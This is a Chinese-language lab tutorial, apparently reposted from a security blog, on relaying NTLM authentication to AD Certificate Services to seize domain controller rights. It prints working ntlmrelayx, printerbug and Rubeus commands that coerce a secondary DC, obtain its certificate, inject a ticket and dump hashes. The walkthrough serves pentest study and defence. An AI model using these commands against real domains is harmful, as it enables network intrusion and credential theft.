攻击AD证书服务获取域控权限
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
前言
当AD安装证书服务后,存在一个HTTP端点:
![攻击AD证书服务获取域控权限](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
攻击者可以利用NTLM Over HTTP来进行ntlmrelay攻击。
详细的介绍可以参考:https://posts.specterops.io/certified-pre-owned-d95910965cd2
环境介绍
攻击机器:192.168.8.164
AD域控(SRV-DC):192.168.8.144
AD辅域(SRV-DC2):192.168.8.155
攻击流程
默认普通用户普通权限:
![攻击AD证书服务获取域控权限](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
使用impacket,更新下这里的pull:
https://github.com/SecureAuthCorp/impacket/pull/1101
攻击机器开启监听:
ntlmrelayx.py -t http://192.168.8.144/certsrv/certfnsh.asp -smb2support --adcs --template 'domain controller'
注意,这里的template参数值得做好适配。
利用打印机服务,使辅域进行强连回来:
python printerbug.py domain.org/user:password@192.168.8.155 192.168.8.164
ntlmrelayx成功进行relay,并获取到证书信息:
![攻击AD证书服务获取域控权限](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
利用证书获取tgt并注入:
Rubeus.exe asktgt /user:SRV-DC2$ /certificate:certificatebase64body /ptt
![攻击AD证书服务获取域控权限](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
成功dump hash:
![攻击AD证书服务获取域控权限](https://www.moonsec.com/wp-content/themes/justnews/themer/assets/images/lazy.png)
上述攻击流程中,除了我标粗的需要注意以外,还需要注意不能relay给自身、子域没权限也不能relay。(感谢daiker)
利用类似打印机服务手法进行ntlmrelay攻击时,除了上述提到的攻击AD CS,还有非约束委派、 CVE-2019-1040的基于资源的约束委派等攻击手法,详细可查看我发表在TSRC的另外一篇文章:红蓝对抗之Windows内网渗透
本文来自https://cloud.tencent.com/developer/article/1863648,经授权后发布,本文观点不代表立场,转载请联系原作者。